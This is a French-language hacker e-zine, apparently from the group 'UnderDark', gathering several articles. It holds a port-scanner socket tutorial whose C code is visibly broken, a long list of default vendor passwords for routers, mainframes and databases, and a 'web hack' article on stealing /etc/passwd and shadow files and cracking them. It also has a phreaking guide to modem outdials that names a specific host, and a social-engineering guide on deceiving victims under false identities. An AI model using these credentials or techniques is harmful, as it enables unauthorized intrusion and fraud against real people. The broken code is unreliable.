 bzero( (char*)&adresse,sizeof(adresse)); 

 /* 
 * metttre a zero tout le contenu de l adresse 
 * ( on peut osi utiliser memset() a la place )
 */

 adresse.sin_family=AF_INET;

 /* 
 * la famille d'adresse utiliser sera AF_INET
 *
 *
 */ 

 adresse.sin_port=htons(port);


 /*
 * conversion des entier court depuis l'ordre des octets de l hote (h) vers
 * (to) celui du rezo (n) .
 *
 */


 if ((adresse.sin_addr.s_addr=inet_addr(argv[1]))==-1)
 {
 printf("ton host n'est pas correcte idiot rentre un IP plZ\n");
 exit(1);
 }

 /* 
 * cette fonction renverra -1 si host n est pas une IP correcte.
 * 
 */

 s=socket(AF_INET,SOCK_STREAM,0);



 /* 
 * cette fonction va servir a creer la socket;selon les parametres que nous allons lui
 passer elle
 * crera un type de socket.le premier parametre est la famille de communication ici
 * nous choisissons AF_INET.
 *




 /* 
 *
 * le secondd parametre est le type de socket a creer.il existe different type de socket
 * -SOCK_STREAM(tcp)
 * -SOCK_DGRAM (udp)
 * -SOCk_RAW (interface directe avec ip)
 * -SOCK_PACKET(interface directe avec ethernet)
 * voila pour l instant.
 * comme nous sommes un client nous allons utiliser SOCK_STREAM.
 *
 *
 */


 /* 
 * le troisieme argument est le protocole,qui normalement s utilise ds la
 * creation de sockets de type SOCK_RAW et SOCK_PAQUET.,dans ce cas nous
 * prendrons 0 come argument afin d utiliser le protocole par defaut.
 *
 *
 */

 la valeur retourne par la fonction socket est le descripteur de fichier (int)
 nous pouvons lire et ecrire ds la socket ,on peut donc le traiter comme un fichier.



 write(s,buffer,strlen(buffer));
 read(s,buffer,sizeof(buffer));




 if (connect(s,(struct sockaddr *)&adresse,sizeof(adresse))==0)
 {
 printf("[%i] ca roule ma poule!\n",port); 
 } 


 /*
 * cette fonction nous sert a connecter notre socket au socket server qui attends
 * l adresse IP et le port defint ds la structure adresse.
 * cette fonction retourne 0 si le socket a reussi a se connecter ,en revanche si la
 conection a ete refuser
 * la fonction retourne -1.
 * 
 */


 close(s);

 /*
 * nous fermons le sockets commes il s agisait un fichier. 
 *
 *
 * 
 */


 -------------------------------------------------------------------------------------
 --------------
 -----------------------------------------------------------------------------------
 ----------------------------


 /* SOCKET EXEMPLE 
 * socket.c
 * gcc -o socket socket.c
 *
 */

 #include <strings.h>
 #include <netinet/in.h>

 #define PROGRAMME "SOCKET"


 void main(int argc, char *argv[])
 {
 struct sockaddr_in adresse;
 int s;
 int port, pintial, pfinal;

 printf("\n%s %s\n",PROGRAMME);

 if (argc <2) { 
 printf("\nsyntaxe: %s <ip> [<port_initial> [<port_final>]]\n\n", argv[0]);
 exit(-1);
 }

 pinitial=0; 
 pfinal=65535;
 if (argc >=3) pinitial=atoi(argv[2]);
 if (argc >=4) pfinal=atoi(argv[3]);

 printf("CA ROULE toujours ma poule !\n"); 

 argv[1],pinitial,pfinal);

 for (port=pinitial;port<=pfinal;port++)
 {
 bzero( (char*)&adresse,sizeof(adresse)); 
 adresse.sin_family=AF_INET;
 adresse.sin_port=htons(port);
 if ((adresse.sin_addr.s_addr=inet_addr(argv[1]))==-1)
 {
 printf("ton host est incorrecte!\n"); exit(1); 
 } 
 s=socket(AF_INET,SOCK_STREAM,0);
 if (connect(s,(struct sockaddr*)&adresse,sizeof(adresse))==0)
 {
 printf("[%i] ca marche ma poule!\n",port); 
 } 
 close(s);
 } 
 } (je sais j aime les poules...) 
 -----------------
 ------

 voila c fini pour cette fois ci mais la prochaine ca sera plus interessant c promis
 j espere que vous appris qqchose grace a ca,si vous avez des questions ou des
 rectifications
 n hesiter pas a me mailer je vous repondrai avec plaisir si j ai le tps.



 by R4ZOR c20@voila.fr

 je remercie NAXIS pour sa bonté et JoKeR pour son humeur dark metal :)

	*************************************************************************
	* 			Random Quote Player						*			
	*<Wyzeman> demolisser IGA								*
      *												*
      *************************************************************************


    ___________________________________________________
   / 						       		 \		
  | [05]-- Oh My God! This is default!		        |
  | 	   			Par Mind Flayer		        |
  |        Sujet: Hacking               		        |
  |							              | 
   \___________________________________________________/



Bon, j'avoue que le titre de l'Article nous vous donne pas trop le sujet qui est en fait 
asser simple. J'ai tout simplement faites une liste la plus complete possible de tout les 
passwords par default que j'ai pu trouver ou que j'ai découvert par moi-meme. Donc dans cet
article, pas beaucoup de blabla mais beaucoup d'information. Enjoy!

3Com
~~~~

tous ==> 						admin    synnet
   							read     synnet
   							write    synnet
							monitor  monitor
   							manager  manager
   							security security

Office Connect 5x0 ISDN Routers ==>	     	n/a      PASSWORD
CellPlex7000 ==>                         	tech     tech
CoreBuilder7000/6000/3500/2500 ==>	      debug    synnet
						      tech     tech
							debug	   tech
HiPerARCv4.1.x ==>                        adm      <blank>
LANplex2500 ==>	                  	debug    synnet
							tech     tech
LinkSwitch2000/2700 ==>                   tech     tech
							debug    synnet
Network Access Card ==>				adm 	   <blank>
SuperStackIISwitch ==>                    2200     debug
							2700     tech
							debug    synnet
							tech     tech
SuperStack/CoreBuilder				admin    <blank>
							read     <blank>
							write    <blank>
							

AcceleratedDSL CPE and DSLAM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
sysadm   	anicust

ADC Kentrox Pacesetter Router
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
n/a      secret

AIX
~~~
guest           guest
software	    software	

Alteon ACEswitch 180e
~~~~~~~~~~~~~~~~~~~~~
admin    admin
admin    <blank>

Alteon Web Systems
~~~~~~~~~~~~~~~~~~
n/a	   admin

Arrowpoint
~~~~~~~~~~
admin    system

AS/400
~~~~~~
qsecofr         qsecofr         /* master security officer */
qsysopr         qsysopr         /* system operator         */
qpgmr           qpgmr           /* default programmer      */

aussi

ibm             password
ibm             2222
ibm             service
qsecofr         1111111
qsecofr         2222222
qserv           qserv
qsvr            qsvr
secofr          secofr
qsrv            ibmce1

Ascom
~~~~~
Timeplex Routers ==> connecter vous en telnet et appuyer plusieurs fois sur ctrl-d

AT&T 3B2 firmware
~~~~~~~~~~~~~~~~~
n/a      mcp

AXIS200/240[netcam]
~~~~~~~~~~~~~~~~~~~
root     pass

BayNetworks
~~~~~~~~~~~

Routeurs ==> 	Manager  <blank>
			User     <blank>
			Manager   Manager
Switch ==> 		login / Manager
			manager / manager
			security / security
			monitor / monitor
			n/a / NetICs

BreezeCOM
~~~~~~~~~
adapters2.x ==>		    n/a      laflaf
adapters3.x ==>	          n/a      Master
adapters4.x ==>   	    n/a      Super

Cabletron
~~~~~~~~~
<blank>  <blank>

Cayman DSL
~~~~~~~~~~
n/a      <blank>

Cisco
~~~~~

Routeur ==> cisco ( marche environ de 20% a 30% du temps)
		letmein
ConfigMaker Software ==> 	n/a 	cmaker

Crystalview outsideview32                
~~~~~~~~~~~~~~~~~~~~~~~~~
n/a      crystal

Cyclades MP/RT
~~~~~~~~~~~~~~
super/surt

DataCom
~~~~~~~
BRASX/I01	==>	n/a      letmein
Osicom	==>	sysadm   sysadm

DECserver
~~~~~~~~~
ACCESS
SYSTEM

digiCorp
~~~~~~~~
n/a      BRIDGE
n/a      password

DLink hub/switches
~~~~~~~~~~~~~~~~~~                        
D-Link   D-Link
n/a	   1234

Dupont Digital Water Proofer
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Sun Sparc ==>	root	par0t

Dynix (pas le OS unix-like, le programme...)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(Taper 'later' pour sortir du login prompt)
setup           <no password>
library         <no password>
circ            <Social Security Number>

Ericsson
~~~~~~~~
roueteurs ==>	netman   netman

Flowpoint
~~~~~~~~~
n/a      password
admin    admin

Hewlett Packard MPE-XL
~~~~~~~~~~~~~~~~~~~~~~
HELLO           MANAGER.SYS
HELLO           MGR.SYS
HELLO           FIELD.SUPPORT     HPUNSUP ou SUPPORT ou HP
HELLO           OP.OPERATOR
MGR             CAROLIAN
MGR             CCC
MGR             CNAS
MGR             CONV
MGR             COGNOS
OPERATOR        COGNOS
MANAGER         COGNOS
OPERATOR        DISC
MGR             HPDESK
MGR             HPWORD
FIELD           HPWORD
MGR             HPOFFICE
SPOOLMAN        HPOFFICE
ADVMAIL         HPOFFICE
MAIL            HPOFFICE
WP              HPOFFICE
MANAGER         HPOFFICE
MGR             HPONLY
FIELD           HPP187
MGR             HPP187
MGR             HPP189
MGR             HPP196
MGR             INTX3
MGR             ITF3000
MANAGER         ITF3000
MAIL            MAIL
MGR             NETBASE
MGR             REGO
MGR             RJE
MGR             ROBELLE
MANAGER         SECURITY
MGR             SECURITY
FIELD           SERVICE
MANAGER         SYS
MGR             SYS
PCUSER          SYS
RSBCMON         SYS
OPERATOR        SYS
OPERATOR        SYSTEM
FIELD           SUPPORT
OPERATOR        SUPPORT
MANAGER         TCH
MAIL            TELESUP
MANAGER         TELESUP
MGR             TELESUP
SYS             TELESUP
MGE             VESOFT
MGE             VESOFT
MGR             WORD
MGR             XLSERVER

IBM
~~~
AS/400 ==>			qsecofr	qsecofr
				qsysopr	qsysopr
				qpgmr		qpgmr
NetCommerce PRO ==>	ncadmin	ncadmin	

Jetform
~~~~~~~
Jetform  n/a

Lantronics Terminal server port           
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
7000     n/a

Linksys DSL
~~~~~~~~~~~
n/a      admin

Livingston
~~~~~~~~~~
IRX router ==>			!root    <blank>
officerouter ==>              !root    <blank>
portmaster2/3 ==>			!root    <blank>

Major BBS
~~~~~~~~~
Sysop           Sysop

Microplex print server
~~~~~~~~~~~~~~~~~~~~~~                    
root     root

Microsoft
~~~~~~~~~
WinNT	==>		Administrator	<blank>
			Guest			<blank>
			Mail 			<blank>
			pkoolt		pkooltPS
SQL Server ==>	n/a			sa

Mitel PBX
~~~~~~~~~
SYSTEM

Motorola
~~~~~~~~
routeurs ==> cablecom/router */sur le port 1024, ne garde pas de log

Multi-Tech RASE Xpress Server
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
guest		<blank>

Nanoteq NetSeq Firewall
~~~~~~~~~~~~~~~~~~~~~~~
admin		NetSeq

NetGear RH328 et RH348
~~~~~~~~~~~~~~~~~~~~~~
n/a		1234

Netopia
~~~~~~~
7100 ==>	<blank>  <blank>
9500 ==>	netopia  netopia

NETPrint
~~~~~~~~
n/a      sysadm

NeXTSTEP
~~~~~~~~
root            NeXT
signa           signa

Nomadic Computing Environment (NCE) Tadpole Technologies SPARCBook3
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
fax             <no password>

Nortel Meridian 1 Pbx
~~~~~~~~~~~~~~~~~~~~~
0000		0000

Novell Netware
~~~~~~~~~~~~~~

SUPERVISOR		==> pas de pass
GUEST			==> pas de pass
ADMIN			==> pas de pass
USER_TEMPLATE 	==> pas de pass

Oracle 8i
~~~~~~~~~
sys		change_on_install

Orbitor console
~~~~~~~~~~~~~~~
n/a      password
n/a      BRIDGE

PICK O/S
~~~~~~~~
DSA             # Desquetop System Administrator
DS
DESQUETOP
PHANTOM


Prolog
~~~~~~
PBX             PBX
NETWORK         NETWORK
NETOP           <null>


Radio Shack Screen Savers
~~~~~~~~~~~~~~~~~~~~~~~~~
RS<STORE_ID_NUMBER>


Rolm
~~~~
CBX Defaults

op              op
op              operator
su              super
admin           pwp
eng             engineer


PhoneMail Defaults

sysadmin        sysadmin
tech            tech
poll            tech

RSX
~~~
SYSTEM/SYSTEM   (Username SYSTEM, Password SYSTEM)
1,1/system      (Directory [1,1] Password SYSTEM)
BATCH/BATCH
SYSTEM/MANAGER
USER/USER

SGI Irix
~~~~~~~~
4DGifts         	<no password>
guest           	<no password>
demos           	<no password>
lp              	<no password>
nuucp           	<no password>
tour            	<no password>
tutor           	<no password>
lp			lp
Administrator 	Partner
root			n/a

Shiva
~~~~~
root     	<blank>
Guest  	<blank>
hello		hello

SpeedstreamDSL
~~~~~~~~~~~~~~
n/a      	admin

Spider Systems M250/M250L
~~~~~~~~~~~~~~~~~~~~~~~~~
n/a		hello

SunOs 4.1.4
~~~~~~~~~~~
root		<blank>

SURECOM Internet Mini-Hub PRO Release
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
n/a		surecom

SysKonnect 6616
~~~~~~~~~~~~~~~
default.password	n/a

System 75
~~~~~~~~~
bcim            bcimpw
bciim           bciimpw
bcms            bcmspw, bcms
bcnas           bcnspw
blue            bluepw
browse          looker, browsepw
craft           crftpw, craftpw, crack
cust            custpw
enquiry         enquirypw
field           support
inads           indspw, inadspw, inads
init            initpw
kraft           kraftpw
locate          locatepw
maint           maintpw, rwmaint
nms             nmspw
rcust           rcustpw
support         supportpw
tech            field


Taco Bell
~~~~~~~~~
rgm             rollout
tacobell        <null>

Terayon
~~~~~~~
TeraLink Getaway ==>		admin		password
					user		password
TeraLink 1000 Controller ==> 	admin		password
					user		password

UClinux for UCsimm
~~~~~~~~~~~~~~~~~~                        
root     uClinux

Unix
~~~~
Vieux systemes ==>	sync/ pas de pass

USR TOTAL Switch
~~~~~~~~~~~~~~~~
<blank>		amber
		  
Verifone Junior 2.05
~~~~~~~~~~~~~~~~~~~~
166816

VMS
~~~
field           service
systest         utep

Webramp
~~~~~~~
wradmin  	    trancell

XON / XON Junior
~~~~~~~~~~~~~~~~
Default password: 166831

Xylan Omniswitch
~~~~~~~~~~~~~~~~
admin    switch
diag     switch
admin	   password

Zyxel
~~~~~
n/a      1234

Voila c'est tout se que j'ai pu trouver...
								Mind Flayer


	*************************************************************************
	* 			Random Quote Player						*			
	*<ACIDmen> on est des élite hacker :)						*
	*<[_}{Ead_]> ok										*
	*<ACIDmen> sauf de bas niveau :)							*
      *************************************************************************

    ___________________________________________________
   / 						       		 \		
  | [06]-- Web Hack						  |
  | 	   			Par [ALIENS]		        |
  |        Sujet: Hacking                		        |
  |							              | 
   \___________________________________________________/


Edito
Bonjour cher lecteur. J'espère que cet article pourra vous ouvrir les yeux sur toutes les
possibilité d'un Hack de page web qui est très courant . Cet article à pour but d'expliquer
quelque technique pour accèder au password . Ipso facto, ceci servira de modèle de protection.

Les points clés à retenir pour hacker une page web sont :
           - Plusieurs failles courantes
           - Hack du gérant de la page web
           - Hack d'un compte Email
           - Ect.

Pour les failles courantes, je parle de CGI, RDS, ect. C'est faille vous serveront à prendre
les passwords. Ceux-ci sont situé dans /etc/passwd ou /etc/shadow . Les passwords ne sont pas
toujours décryptable dans les /etc/passwd mais le sont /etc/shadow . Pour connaitre les CGI 
holes les plus courants je vous conseille d'aller vous procurez sur www.madchat.org section 
Hacking le travail de Putois. Ce texte vous expliqueras comment utiliser les failles CGI . 
Évidemment, vous ne pourrez pas toute essayer d'utiliser les CGI holes car il y en a une bonne 
liste . C'est pourquoi vous devrez par conséquent vous procurez un CGI-SCAN a 
http://packetstorm.securify.com ( Sous linux de préférence ) ainsi que John the ripper pour 
décrypter les fichiers .

Hack d'un gérant de page web
Suffit seulement d'atteindre les fichiers *.pwl et de les décrypter avec pwltool. Vous pourrez
donc utiliser soit une backdoor, ou une autre façon plus approprier . Cette technique est 
plutot utiliser envers les Webmasters Newbies . 

Hack d'un compte Email
Vous avez surement deja essayer de pénétrer un compte email . Vous saurez donc qu'il n'est pas
trop difficile quand on s'y met . Si vous n'êtes pas en mesure de vous procurez le password . 
Et bien toute serveur email vous donne l'option "Give me a hint" . Ceci consiste a une 
Question/Réponse pour finir par vous donnez votre password tant rechercher .

Comment bien se protèger ?
Question pas très compliquer, il vous suffit d'avoir de multiple password non enregistrer sous
Windows . Quand je vous parle de password, je parle de "ur3kf4", des passwords non brute 
forcable et pas devinable . Il faut aussi avoir un bon serveur . Avant d'enregistrer votre 
.com . Faite un CGI-SCAN pour dormir en paix .

~~~END~~~
Je termine ce cour article en espérant que ceci vous a un peu éclairer sur le How To Hack
web page . Espérons que vous saurez aussi comment bien vous protègez .

[ALIENS]

	*************************************************************************
	* 			Random Quote Player						*			
	*<[_}{Ead_]> AcIDAwaY: pis c quoi vos gros hack que vous avez fait??	*
	*<ACIDmen> chu pas hacker ! :)							*
	*<ACIDmen> jai hacker le hotmail a mon pere :)					*
	*<ACIDmen> pi le pass était su un ti papier :P					*
      *************************************************************************
    ___________________________________________________
   / 						       		 \		
  | [07]-- Internet Outdial					  |
  | 	   			Par Mind Flayer		        |
  |        Sujet: Phreaking            		        |
  |							              | 
   \___________________________________________________/

Bonjour, c'est encore moi... Comme j'ai pas beaucoup d'aide pour écrire ce zine j'crois que
je vais peut-etre finir par un écrire plus de la moitié a moi seul. Tk j'vous emmerderais pas
avec mes problemes et je vais continuer cet article. Bon j'ai décidé de vous parler des 
outdials sur Internet.Alors allons y!

Mais merde, c'est quoi un outdial??
===================================
Un outdial internet est un modem connecté sur internet qui permet de se servir du modem pour
appeller vers l'exterieur de l'internet, genre sur un bbs, un dial-in ou un truc du genre.
Les dial-outs normaux ne peuvent que faire des appels locaux. Alors si vous voulez vous 
connecter sur le BBS de votre cousin en exil au Mexique a partir de votre outdial situé en 
Colombie-Brittanique vous oublier ca tout de suite! Il existe cepandant un type de outdial
aussi appelle GOD pour Global Out-Dial qui permet de faire des appels interurbains. Un outdial
peux servir par exemple a appeller un BBS situé dans la meme zone que la outdial pour pas une
crisse de cenne.

Bon alors comme ca fonctionne un outdial??
==========================================
Il existe plusieurs type de outdial, cepandant la plupart fonctionne avec la commande
atdtXXXxxxx
c a dire
mettons le outdial est situer a Trois-Rivieres (indicatif 819)
pis tu veux appeller chez pas moi tin chez cogeco pour que la bonne femme buzz a entendre le 
son du modem (facon stupide de l'utiliser je vous l'accorde)
il suffit de taper la commande
atdt6933131
il existe d'autre outdial qui fonctionne semblablement
genre la commande pur le meme numero serait
atdt9,6933131
ou un autre chiffre apres le dernier "t" de atdt. Aussi oublier pas la virgule...

Comment existe t'il de sorte de outdial
========================================
Selon les informations que j'ai eu, ils en plusieurs types mais je n'en est rencontrer que 3, 
je vais vous decrire les 3 types connus d'outdial en vous les montrant tout simplement. 
Je sait qu'il en existe un 4ieme type fonctionnant avec le login modem sur une box unix mais 
c'est les seul information que j'ai put trouver sur le sujet.

*/sont des commentaire de moi

Type 1
~~~~~~
CONNECTION COMPLETE.

AUTOCALL NO.  LOCAL.    PLACE CALL?

yes  */ y aussi peux focntionner

CALLING 5165  */Le systeme appelle le modem sur le port sur lequel le modem fonctionne. 
		  */Ceci indique aussi que la box possede surement plus d'un outdial
CALL COMPLETE */ le modem est pret!

atdt 9,1234567890 */le numero signaler
BUSY              */ le resultat de l'appel

atdt 9,4166372633 */ No carrier veux souvent dire que kkun a repondu ou tout simplement que la 
			*/ ligne est morte
NO CARRIER

Type 2
~~~~~~
DIAL:       */ il suffit de taper modem

DIAL: modem

RINGING     */ il se connecte sur le bon port
ANSWERED    */ ca marche 

atdt 6163452345 */signaler votre numero

RINGING
DISCONNECT

Type 3
~~~~~~
CONNECTION COMPLETE

>>

You may now enter Net/One commands.

>>help
   The Net/One commands are:
     CONNECT Resource Name<CR>
     GET Resource Name<CR>
     LIST<CR>
     RESUME Connection Number<CR>
     ABANDON Connection Number<CR>
     EXAMINE Resource Name<CR>
     IDENTIFY Node ID<CR>
     SET DISCONNECT /New Disconnect Sequence /<CR>
     SET HOLD /New Hold Sequence/<CR>
     SET ECHO ON<CR> or OFF<CR>
     SET LINEFEEDS ON or OFF[ FOR ECHOES or INPUT or OUTPUT]<CR>
     SET BINARY ON<CR> or OFF<CR>
     SET FLOW NONE/CHARS/ENQ-ACK/SIGS/CTS-RTS/DSR-DTR/XON-XOFF[ NIU/DEVICE]<CR>
     LOGOUT<CR>
     QUIT<CR>

>>connect hayes         */ le mot hayes donne souvent des resultats, souvent ne veux pas 
				*/ dire tout le temps ;P
   Connecting ... "hayes" was not found.

>>list
   You are using port 1 of Net/One NIU-180 number 53821A, on network number 1.
   Port 1's name is "53821A1".   NIU 53821A's name is "xns4"

   Connection 1 is unused.
   Connection 2 is unused.
   Connection 3 is unused.

Your Hold Seq**BREAK**

>>connect 53821a3
  Connecting ... "53821a3" is busy
>>connect TELNET                       */ peux aussi servir de telnet gateway
  Connecting ... (1) 57684A1 Success.

The string "Virginia.EDU" is appended to all hostnames you enter.
Example: connect to a prime computer with: connect bert.acc

Enter TCP/IP Net/One commands.

>>
>>list
  You are using port 1 of Net/One NIU-180 number 48841A.
  on net/subnet number 192.35.49.0.
  Port 1's IP address is 192.35.49.121.
  Port 1's name is "48841A1". NIU 48841A's name is "ublan-telnet-1".

Connection 1 is unused.

Your Hold Sequence is: <FS>HLD.
Your Disconnect Sequence is: <FS>OFF.

The Net**BREAK**

>>connect modem                                      
  You can't make another connection until you finish the with one you have now.
  Connection 1 to "?" os not open yet.             
                                                               
>>logout
  IDLE

  Your Connection number 1 to "TELNET" [(1) 57684A1] has been hung up.

You may now enter Net/One commands.

>>connect modem
  Connecting ... (1) 57682A1 Success.

Please prefix all calls with a 9. Use constitutes consent to monitoring.

d ?      Lists stored numbers 1 to 8.
d number Dials number (must be prefixed 9,)
q or x   End session.

Enter commands.

OK

D 9,4164563321    

CONNECT 
NO CARRIER

Call Terminated by HOST

Ou est-ce que je peux trouver un outdial??
==========================================
Beaucoup d'université americaine possede un outdial, c'est deja un bon endroit pour commencer
a chercher, au quebec il en existe mais je n'ai jamais trouver, j'ai peut-etre pas asser
chercher. Pour completer cet article j'ai decider de vous donner un outdial qui marche, 
malheureusement, j'ai pas le pass alors a vous de le trouver.
Host				Port		Commandes
====				====		=========
gate.cis.pitt.edu        23    	tn3270,
                                    connect dialout.pitt.edu,
                                    atdtxxxXXXX

						ou essayer
						
						dialout


Et voila c'est deja tout sur les outdials...	
									Mind Flayer

	*************************************************************************
	* 			Random Quote Player						*			
	*<Naxis]» Moi jva demenager sur un ile pis ma aller habiter avec la 	*
	*aborigene eu autre son bin en tabarnak						*
	*												*
      *************************************************************************
	
    ___________________________________________________
   / 						       		 \		
  | [08]-- Powered By Budweiser				  |
  | 	   			Par Mind Flayer & Kool_Shen	  |
  |        Sujet: Délire            		        |
  |							              | 
   \___________________________________________________/


Bon, apres 7 articles ca commence a devenir ennuyant de lire de la theorie et comme Wyzeman
dit tout le temps: "Faut pas qu'un zine sa soit comme un livre d'école". Donc un article 
délirant de temps a temps permet de relacher la tension et de relaxer en lisant quelque 
chose de stupide et con tout en étant pas totalement dénué d'interet. Alors c'est simple
on as décidé de conter une petite veiller du UnderDark staff a Trois-Rivieres.

.===================================================================.
||                            ___                                  ||
||                          .'   '.                                ||
||                         /       \           oOoOo               ||
||                        |         |       ,==|||||               ||
||                         \       /       _|| |||||               ||
||                          '.___.'    _.-'^|| |||||               ||
||                        __/_______.-'     '==HHHHH               ||
||                   _.-'` /                   """""               ||
||                .-'     /   oOoOo                                ||
||                `-._   / ,==|||||                                ||
||                    '-/._|| |||||                                ||
||                     /  ^|| |||||                                ||
||                    /    '==HHHHH     UnderDark Beuverie:        ||
||                   /________"""""     le retour de la revanche   ||
||                   `\       `\        Feat: Mind Flayer          ||
||                     \        `\   /        Kool_Shen            ||
||                      \         `\/         SnowClak             ||
||                      /               16ans et +, Excess beer    ||
||                     /                                           ||
||                    /_____                                       ||
||                                                                 ||
'==================================================================='


bon, tout commence une tite soirée ou un pote a Kool_Shen et moi, communement appellé SnowClak
me call pour partir un projet de beuverie au centre-ville de Trois-Rivieres. Bon c'est cool
on se soule la gueule, SnowClak call vi0l4t0r pis moi j'call Kool_Shen. On decide de
se rejoindre dans la cour d'une école primaire pas trop loin d'ou on n'etais. On se
rejoint toute la et on apprends que vi0l4t0r viendra pas finalement. Pas grave sa va faire 
plus de bière pour nous autres. Bon direction dépanneur question de se procurer de l'alcool
pas trop cher pis d'etre soue pas mal avant d'arriver au  centre-ville. Bon let's go on rentre
, on se pogne chacun une grosse quille pour ensuite aller a caisse. La fuck fait chier la 
salope a nous carte, on la gosse un peu juska temps qua nous avoue qu'une fausse carte sa serais
correct. Seul petit probleme, personne a de fausse carte sur lui, On sort du dep et avec la 
vieille carte d'assurance maladie de Mind (eille c moi ca!), on reussi a la transformer
en quelque chose qui ressemble a soit un "1" ou un symbole bizarre. Kool retourne en dedans
et reussi a sortir les biere en cruisant un peu la fille a caisse ;P

Bon, faudrait bin commencer a caller ca, on va dans une cour d'école primaire a coté du 
depanneur pour aller s'asseoir paisiblement sur des grosses roches et caller notre grosse
biere tranquille. La cour est asser vide sauf des jeunes (genre 11-12ans) qui jouent
a kick la cacane avec des Anges Gardiens. Bon les anges gardiens c genre la securité dans les
parcs de la ville pour pas que le monde se call de biere ou fume des gros joints la, mais
pour que le monde qui le font aille pas a se faire arreter par la police (c'est pas vraiment
facile a expliquer mais bon, si il en as proche de chez vous vous comprendrez). Les anges
gardiens vienne nous parler pis dise rien pour la biere youyou! l'heure avance et faudrais se
depecher a prendre la bus pour aller au centre-ville. Fuck reste 5 minutes pis la grosse biere 
est encore au 1/2 pleine. Calage rapide pour ensuite arriver a l'arret et se rendre compte
qu'on l'avais manquer. Pas grave yen as une autre dans ½ heures. On va aller se chercher de la
biere pour passer le temps. On retourne au depanneur se chercher un sixpack de heineken. 
Retour a l'arret de bus pour se rendre compte qu'on avais totalement oublier qui faut
un debouche-bouteille pour ouvrir les putains de heineken. Pas grave, underdark possede des 
skills surprenante quand on as soif. On reussi a les ouvrir (meme si ca gicler un peu partout)
pis on s'en call une tranquille. Tour de bus, youpi c'est le fun, direction centro, on va aller 
voir se qui se passe dans le boute. Rendu au centro on descends de la bus, prend la direction
du musée chez pu trop quoi , tk celui qui est fermer pis on hijack leur cour pour se caller une 
autre heineken. On reussi a enlever les bouchons, glou glou glou, ca fais du bien :)

Apres on criss notre camp de la, direction depanneur yogi, question de retourner faire le plein 
d'alcool. Bon, on commence toute a etre pucker un peu, on va se pogner une grosse Colt 45 pour
se souler comme du monde. Direction iso, qui est un endroit asser trou au centre-ville, sur
le bord de l'eau, chez pas trop d'ou vient le nom iso mais bon sa s'appelle de meme. On se call
la Colt 45 et Kool_Shen nous sort son gazon qui fait rire. Petite fumette, suivi d'un retour 
vers notre lieu d'approvisionement #1 en alcool pas cher, Dépanneur Yogi!
Kool_Shen va nous chercher un autre sixpack de molson ex, on retourne a l'iso boire ca.
Apres 1 bieres, SnowClak decide de nous montrer son repas pre-digéré, ctaiut asser affreux
mais bon sa lui apprendras a essayer de nous suivre ( sa fesait a peine 3-4 heures qu'on buvais
et normalement sa l'aurais du durer 2-3 heures de plus). Pas grave, on fini nos bieres pis
on va faire un tour chez McDo, youyou trip de bouffe trio McXtra avec fromage et bacon.
On decide alors de ramener SnowClak avant qui gerbe partout. 

On attends la bus tranquillement, en pickant des tites jasettes avec les passants que l'on
connais, pour ensuite voir Snowclak gerber une fois de plus dans l'arret de bus. Pas grave la 
bus arrive bientot. La bus fini par arriver, tien, des tites femmes, on picke une tite jasette
pendant que SnowClak badtrip dans le fond de la bus, pogne le transfert, retourne SnowClak chez 
eux, Mind et Kool_Shen vont faire un tour chez un de leur potes, cool, 1 heure du mat pis 
ya encore popire de monde. On jase un peu la et apres tout le monde retourne tranquillement
a la maison soue comme une botte mais en se disant que la prochaine sera la bonne.


								Mind Flayer & Kool_Shen  
 
	*************************************************************************
	* 			Random Quote Player						*			
	*<Wyzeman>jaimais mieu jouer des clave au primaire que decouter 		*
	*         du hiphop									*
	*												*
      *************************************************************************

    ___________________________________________________
   / 						       		 \		
  | [09]-- Social Enginnering					  |
  | 	   			Par [ALIENS]		        |
  |        Sujet: Hacking            		        |
  |							              | 
   \___________________________________________________/

Qu'est-ce que le Social Enginnering ? C'est une méthode utiliser par Hacker/Phreaker pour
avoir accès à des informations pouvant servir a un hack . En fait, c'est pas très compliquer
sa consiste à parler directement avec la personne et prendre des informations pour accèder 
à la cible voulu.
                       Exemple: Prendre les dates de naissance, #téléphone, toutes informations
                                pouvant servir à se faire une liste de password pour accèder 
                                à ce que vous voulez.

Il s'agit de faire la conversation avec l'autre et de parler de multiple sujet pour finir par
prendre des informations de tout genre pouvant aider à trouver les mots de passe requis.
Vous crosserez surment votre victime sur un service tel que IRC, ICQ , Téléphone.
Vous apprendrez par le fait même comment s'en passer en connaissant les principales méthodes 
ne donnant donc à votre attaquant de vous crossez. Avec ces techniques, il n'est guère question
de la version du OS et etc., vous allez seulement avoir avec ceci les passwords. Après se sera
à vous de savoir comment les utiliser, vous devez être très subtile et très bon acteur par
le fait même. Si vous doutez de vous un instant il est possible que votre victime commence
fortement à ce poser des questions de votre franchise. Surtout, ne pas utiliser votre vrai
identité pour ceci. Car vous êtes si jamais vous le hackez un coupable potentiel c'est pourquoi
il est préférable d'utiliser un autre identité.

Social Enginnering on the net !
Pour les utilisateurs de IRC, ICQ, ou autre Chat connu. Vous aurez seulement quelques 
informations vagues car de moin en moin de personne vont donner leur vrai info. Cependant, 
avec ce que vous trouverez, vous allez possiblement avoir en partant son nom et son âge 
( exemple : Cath15 ) . Après il suffit d'être crissement bon crosseur afin de pouvoir avoir 
des informations plus personelles .

Social Enginnering in you life !
Cette technique est l'original, vous voulez hacker une compagnie, un "ami", etc. Et bien, ya 
pas de meilleur façon que faire vos contacts dans votre vrai vie. Si vous le faites sur 
quelqu'un que vous connaissez, j'imagine que vous allez garder la même identité mais pas la 
même sur le net pour le hacker. Si vous voulez hacker une compagnie, va falloir être seul ou 
avec une personne de préférence, avoir un jolie costume de votre personnage et une nouvelle 
identité pour le moment. Soyez extrêmement discret car même si vous ne pouvez pas accèder aux 
informations, vous pouvez vous faire pognez, exemple : un plombier qui sait pas son job c'est 
bizarre non ? Vous devez vous arrangez pour qu'il y aille le moins d'employés possibles, et 
les nouveaux sont forcément plus facile à crosser. Vous pouvez également faire le tout par 
téléphone, exemple : besoin des informations sur les serveurs ... etc.

